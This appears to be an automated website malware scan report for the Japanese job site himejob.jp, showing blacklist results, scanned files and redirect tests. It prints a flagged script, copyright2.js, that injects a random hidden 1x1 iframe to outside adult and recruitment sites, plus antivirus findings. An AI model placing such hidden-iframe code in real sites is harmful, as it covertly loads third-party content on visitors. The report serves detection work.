Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=himejob.jp
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://himejob.jp/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://himejob.jp/ | 200 OK Content-Length: 83475 Content-Type: text/html | clean |
http://himejob.jp/js/sponsor.js | 200 OK Content-Length: 11107 Content-Type: application/javascript | clean |
http://himejob.jp/js/month.js | 200 OK Content-Length: 265 Content-Type: application/javascript | clean |
http://himejob.jp/js/copyright2.js | 200 OK Content-Length: 1596 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var txt = new Array(); txt[0]="<iframe src='http://www.tachikawa-celeb.com/' rel='nofollow' width='1' height='1' frameborder='0'></iframe>"; txt[1]="<iframe src='http://goo.gl/mzuoq' rel='nofollow' width='1' height='1' frameborder='0'></iframe>"; txt[2]="<iframe src='http://www.over30job.com/' rel='nofollow' width='1' height='1' frameborder='0'></iframe>"; txt[3]="<iframe src='http://www.girlsbar.tv/' rel='nofollow' width='1' height='1' fram txt[10]="<iframe src='http://himejob.jp/tokyo_x/' rel='nofollow' width='1' height='1' frameborder='0'></iframe>"; txt[11]="<iframe src='http://himejob.jp/kanagawa_x/' rel='nofollow' width='1' height='1' frameborder='0'></iframe>"; txt[12]="<iframe src='http://arinsu.net/' rel='nofollow' width='1' height='1' frameborder='0'></iframe>"; mmax = 13; txtno = Math.floor(Math.random() * mmax); document.write(txt[txtno]); Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://universe-club.jp/women/ <iframe src='http://universe-club.jp/women/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://www.over30job.com/ <iframe src='http://www.over30job.com/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://recruit.ghg7.com/ <iframe src='http://recruit.ghg7.com/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://www.h-baito.com/ <iframe src='http://www.h-baito.com/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://www.girlsbar.tv/ <iframe src='http://www.girlsbar.tv/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://e-cawa.jp/?p=w16 <iframe src='http://e-cawa.jp/?p=w16' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://arinsu.net/ <iframe src='http://arinsu.net/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://deai-group.net/wakaduma/index.html <iframe src='http://deai-group.net/wakaduma/index.html' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://www.love-wife.tv/ <iframe src='http://www.love-wife.tv/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://www.tachikawa-celeb.com/ <iframe src='http://www.tachikawa-celeb.com/' rel='nofollow' width='1' height='1' frameborder='0'> Hidden iFrame found. size: 1x1 src: http://goo.gl/mzuoq <iframe src='http://goo.gl/mzuoq' rel='nofollow' width='1' height='1' frameborder='0'> | ||
http://himejob.jp/hokkaido_x/ | 200 OK Content-Length: 8342 Content-Type: text/html | clean |
http://himejob.jp/js/home.js | 200 OK Content-Length: 72 Content-Type: application/javascript | clean |
http://himejob.jp/hokkaido_x/../js/sponsor_0.js | 200 OK Content-Length: 1090 Content-Type: application/javascript | clean |
http://himejob.jp/js/vip_hokkaido.js | 200 OK Content-Length: 380 Content-Type: application/javascript | clean |
http://himejob.jp/js/copy_hokkaido.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://himejob.jp/tohoku_x/ | 200 OK Content-Length: 6999 Content-Type: text/html | clean |
http://himejob.jp/js/sponsor_1.js | 200 OK Content-Length: 746 Content-Type: application/javascript | clean |
http://himejob.jp/hokuriku_x/ | 200 OK Content-Length: 6969 Content-Type: text/html | clean |
http://himejob.jp/js/sponsor_2.js | 200 OK Content-Length: 671 Content-Type: application/javascript | clean |
http://himejob.jp/kantou_x/ | 200 OK Content-Length: 7577 Content-Type: text/html | clean |
http://himejob.jp/js/sponsor_9.js | 200 OK Content-Length: 1556 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: himejob.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Dec 2014 02:12:06 GMT
Server: Apache/2.2.25
Content-Type: text/html; charset=Shift_JIS
GET / HTTP/1.1
Host: himejob.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Dec 2014 02:12:06 GMT
Server: Apache/2.2.25
Content-Type: text/html; charset=Shift_JIS
Second query (visit from search engine):
GET / HTTP/1.1
Host: himejob.jp
Referer: http://www.google.com/search?q=himejob.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: himejob.jp
Referer: http://www.google.com/search?q=himejob.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.